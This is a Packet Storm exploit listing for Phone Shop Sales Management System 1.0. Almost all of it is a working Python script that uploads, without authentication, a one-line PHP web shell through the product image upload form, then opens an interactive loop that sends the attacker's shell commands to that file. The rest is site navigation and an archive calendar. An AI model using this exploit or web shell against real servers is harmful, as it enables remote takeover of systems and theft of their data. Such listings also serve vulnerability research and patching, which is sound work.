exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Phone Shop Sales Management System 1.0 Shell Upload

Phone Shop Sales Management System 1.0 Shell Upload
Posted Apr 20, 2021
Authored by Richard Jones

Phone Shop Sales Management System version 1.0 suffers from a remote shell upload vulnerability.

tags | exploit, remote, shell
SHA-256 | a9d783359f5681aecb35f681452b1256db981ccbab1c518a9d5c58b33c753964

Phone Shop Sales Management System 1.0 Shell Upload

Change Mirror Download
# Exploit Title: Phone Shop Sales Management System - Arbitrary File Upload (Unauthenticated)
# Date: 20/04/21
# Exploit Author: Richard Jones
# Vendor Homepage: https://www.sourcecodester.com/php/10882/phone-shop-sales-managements-system.html
# Version: 1.0
# Tested on: Windows 10 build 19041 + xampp 3.2.4

import requests
import sys

IP="127.0.0.1" # CHANGE ME

ADDURL=f"http://{IP}/osms/Execute/ExAddProduct.php"
CALLSHELLURL=f"http://{IP}/osms/assets/img/Product_Uploaded/rev.php"
s = requests.Session()

def postShell():

data = {
"ProductName":"1",
"BrandName":"1",
"ProductPrice":1,
"Quantity":"1",
"TotalPrice":1,
"DisplaySize":"1",
"OperatingSystem":"1",
"Processor":"1",
"InternalMemory":"1",
"RAM":"1",
"CameraDescription":"1",
"BatteryLife":"1",
"Weight":"1",
"Model":"1",
"Dimension":"1",
"date2":"1",
"Description":"1",
"_wysihtml5_mode":"1",
}


fileData = {
'ProductImage':("rev.php","<?php system($_GET['c']);?>", "application/octet-stream")}

r = s.post(ADDURL, files=fileData, data=data)

if "The product is successfully added" in r.text:
return True
else:
return False

def runWebShell():
try:
while True:
cmd=input("\033[32;1m" +"$: "+ "\033[0m")
if cmd == "exit":
sys.exit()
r = s.get(f"{CALLSHELLURL}?c={cmd}", verify=False)
if r.status_code == 200:
print(r.text)
else:
raise Exception("Cmd error")
except KeyboardInterrupt():
sys.exit()

def banner():
ban = r"""__________.__ _________.__ _________ .__ _____ _________
\______ \ |__ ____ ____ ____ / _____/| |__ ____ ______ / _____/____ | | ____ ______ / \ / _____/
| ___/ | \ / _ \ / \_/ __ \ \_____ \ | | \ / _ \\____ \ \_____ \\__ \ | | _/ __ \ / ___/ / \ / \ \_____ \
| | | Y ( <_> ) | \ ___/ / \| Y ( <_> ) |_> > / \/ __ \| |_\ ___/ \___ \ / Y \ / \
|____| |___| /\____/|___| /\___ > /_______ /|___| /\____/| __/ /_______ (____ /____/\___ >____ > \____|__ / /\ /_______ / /\
\/ \/ \/ \/ \/ |__| \/ \/ \/ \/ \/ \/ \/ \/ """

return ban

def main():
print("\033[34;1m" + banner() + "\033[0m")
print("\033[32;1m" + "Created by Richard Jones 20/04/2021"+ "\033[0m" + "\n")
print("\033[72;1m" +"[+] Sending WebShell..."+ "\033[0m")
if postShell():
print("\033[72;1m" +"[+] Calling WebShell..."+ "\033[0m")
runWebShell()

if __name__ == "__main__":
main()
Login or Register to add favorites

File Archive:

November 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    1 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    0 Files
  • 5
    Nov 5th
    0 Files
  • 6
    Nov 6th
    0 Files
  • 7
    Nov 7th
    0 Files
  • 8
    Nov 8th
    0 Files
  • 9
    Nov 9th
    0 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    219 Files
  • 14
    Nov 14th
    19 Files
  • 15
    Nov 15th
    66 Files
  • 16
    Nov 16th
    38 Files
  • 17
    Nov 17th
    9 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    11 Files
  • 22
    Nov 22nd
    56 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    36 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    14 Files
  • 28
    Nov 28th
    30 Files
  • 29
    Nov 29th
    35 Files
  • 30
    Nov 30th
    25 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close